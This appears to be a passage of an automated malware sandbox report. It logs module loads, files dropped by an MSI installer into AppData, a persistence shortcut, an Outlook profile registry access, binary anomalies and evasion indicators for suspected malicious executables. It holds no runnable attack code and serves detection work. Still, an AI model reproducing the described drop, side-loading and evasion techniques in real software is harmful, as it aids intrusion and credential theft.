                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: linkinfo.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: ntshrui.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: cscapi.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: bitsproxy.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe, Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: datastate.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: msftedit.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: comsvcs.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: cmlua.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: cmutil.dll
                      Source: C:\Windows\SysWOW64\cmd.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: datastate.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe, Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: cryptsp.dllJump to behavior
                      Source: wpfwiocg.7.drLNK file: ..\..\Roaming\toolsync_RO\IDRBackup.exe
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: ONHQNHFT.msiStatic file information: File size 6766592 > 1048576
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: comvalidate_ljv3.exe
                      Source: Binary string: wntdll.pdbUGP source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: comvalidate_ljv3.exe
                      Source: Binary string: wntdll.pdb source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C488B27 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_6C488B27
                      Source: wqosufsc.7.drStatic PE information: real checksum: 0x280dfb should be: 0x278f67
                      Source: ikltbdky.19.drStatic PE information: real checksum: 0x280dfb should be: 0x278f67
                      Source: datastate.dll.1.drStatic PE information: real checksum: 0x1ac96 should be: 0x1d6c3
                      Source: datastate.dll.2.drStatic PE information: real checksum: 0x1ac96 should be: 0x1d6c3
                      Source: sqlite3.dll.1.drStatic PE information: section name: /4
                      Source: sqlite3.dll.1.drStatic PE information: section name: /19
                      Source: sqlite3.dll.1.drStatic PE information: section name: /31
                      Source: sqlite3.dll.1.drStatic PE information: section name: /45
                      Source: sqlite3.dll.1.drStatic PE information: section name: /57
                      Source: sqlite3.dll.1.drStatic PE information: section name: /70
                      Source: sqlite3.dll.1.drStatic PE information: section name: /81
                      Source: sqlite3.dll.1.drStatic PE information: section name: /92
                      Source: sqlite3.dll.2.drStatic PE information: section name: /4
                      Source: sqlite3.dll.2.drStatic PE information: section name: /19
                      Source: sqlite3.dll.2.drStatic PE information: section name: /31
                      Source: sqlite3.dll.2.drStatic PE information: section name: /45
                      Source: sqlite3.dll.2.drStatic PE information: section name: /57
                      Source: sqlite3.dll.2.drStatic PE information: section name: /70
                      Source: sqlite3.dll.2.drStatic PE information: section name: /81
                      Source: sqlite3.dll.2.drStatic PE information: section name: /92
                      Source: comvalidate_ljv3.exe.7.drStatic PE information: section name: Shared
                      Source: wqosufsc.7.drStatic PE information: section name: .xdata
                      Source: wqosufsc.7.drStatic PE information: section name: cvgr
                      Source: ikltbdky.19.drStatic PE information: section name: .xdata
                      Source: ikltbdky.19.drStatic PE information: section name: cvgr
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_50012004 push 50012030h; ret 2_2_50012028
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F22C push eax; retn 00FEh2_2_5000F230
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F234 push eax; ret 2_2_5000F238
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F26C push eax; retf 00FEh2_2_5000F270
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F274 push eax; retf 2_2_5000F278
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F294 push eax; iretd 2_2_5000F298
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_500153A4 push 500153D0h; ret 2_2_500153C8
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F49C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4A4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4AC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4B4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4BC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4C4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4CC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4D4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4DC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4E4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4EC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4F4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4FC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F504 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F50C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F514 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F51C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F524 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F52C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F534 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F53C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F544 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F54C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F554 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\datastate.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\vclx120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\madexcept_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\vclx120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\vcl120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\madexcept_.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ikltbdkyJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\madbasic_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\maddisAsm_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\maddisAsm_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\vcl120.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\wqosufscJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\sqlite3.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400853D4 GetPrivateProfileStringW,lstrlenW,10_2_00000001400853D4

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WQOSUFSC
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\IKLTBDKY
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeAPI/Special instruction interceptor: Address: 6C547C44
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI/Special instruction interceptor: Address: 6C547C44
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI/Special instruction interceptor: Address: 6C547945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C543B54
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ikltbdkyJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wqosufscJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI coverage: 7.5 %
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeAPI coverage: 1.0 %
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe TID: 7604Thread sleep time: -90000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,2_2_5001C0CC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_5000C390
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,2_2_5001BB34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,2_2_5001BD10
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000A5E0 GetDlgItem,SendMessageW,SendMessageW,SendMessageW,wsprintfW,GetClientRect,SendMessageW,FindFirstFileW,lstrlenW,SendMessageW,FindNextFileW,FindClose,10_2_000000014000A5E0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140007628 FindClose,lstrlenW,lstrcpyW,FindFirstFileW,GetFullPathNameW,FindClose,SetLastError,lstrlenW,10_2_0000000140007628
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000D848 GetLogicalDriveStringsW,GetDlgItem,GetDriveTypeW,_cwprintf_s_l,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SHGetSpecialFolderPathW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,RegOpenKeyExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,SendMessageW,SendMessageW,SendMessageW,RegCloseKey,10_2_000000014000D848
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
